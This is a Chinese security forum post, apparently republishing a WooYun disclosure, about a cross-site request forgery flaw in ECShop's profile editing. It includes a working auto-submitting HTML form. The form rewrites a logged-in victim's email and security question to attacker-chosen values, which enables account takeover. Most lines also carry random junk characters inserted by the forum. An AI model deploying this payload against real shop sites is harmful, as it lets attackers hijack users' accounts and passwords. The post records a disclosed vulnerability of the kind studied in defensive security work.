找回密码
 立即注册
欢迎中测联盟老会员回家,1997年注册的域名
查看: 1905|回复: 0
打印 上一主题 下一主题

ecshop修改任意用户密码漏洞的CSRF利用

[复制链接]
跳转到指定楼层
楼主
发表于 2013-2-20 08:30:14 | 只看该作者 回帖奖励 |倒序浏览 |阅读模式
简要描述:
& n* _2 ~! {6 n- U; gecshop在设计认证机制的时候存在一个问题,导致恶意用户可以窃取其他用户的密码,这个过程可以通过xss和csrf实现- F, q: d3 }7 N! _
$ F, w/ a' G$ \" t4 c* l( D2 Q; @4 I
Demo For:http://www.wooyun.org/bug.php?action=view&id=395
2 H6 x# s" H2 W  y6 ?
6 F9 v1 u+ `- J: N: |0 H. ~详细说明:- F% R1 {9 q3 M# n  F/ U7 }; [
利用csrf和xss可以突破官方所说的“障碍”
+ B+ }1 Y+ s4 fxss版本已经有人说明
5 [4 k, N" ~$ ]7 ?8 v6 [这里给出csrf版本4 b! @1 n% G$ u2 q
, C7 z- ~# `  ?/ L/ U. S+ w9 ~# {
漏洞证明:* u! t4 s9 f# e4 k; j
<html>
' n# b% a3 V& U5 ^<body>* z6 ~5 e+ A; j! J4 K
<form action="http://www.wooyun.org/ecshop/user.php" method="POST">" Z; q8 }6 d- _" x
<INPUT TYPE="text" NAME="email" value="hack@wooyun.org">
) N+ F" c6 y: X/ M+ f<INPUT TYPE="text" NAME="act" value="act_edit_profile">! T4 c3 g- Z: l
<INPUT TYPE="text" NAME="sel_question" value="ecshop">- v& e5 E' b2 `4 {( x
<INPUT TYPE="text" NAME="passwd_answer" value="exploit">
9 H/ t$ p& l5 h* C3 D5 V4 J</body>+ Y6 ^4 I' D* K: _
<script>
% o% J2 H9 _( x' gdocument.forms[0].submit();# N' R% U: ]3 F+ X4 c9 d8 Q8 A
</script>
3 ?& }, V- e" ?: f; W</html>
% l6 x1 T% V& V( n9 g# M% q( U构造该网页,用户在登录情况下访问该网页将导致email以及一些其他安全信息丢失3 p! W# v" x* H7 K9 V

" Q  z8 k8 L( D7 P0 N* L" t9 q0 F
回复

使用道具 举报

您需要登录后才可以回帖 登录 | 立即注册

本版积分规则

快速回复 返回顶部 返回列表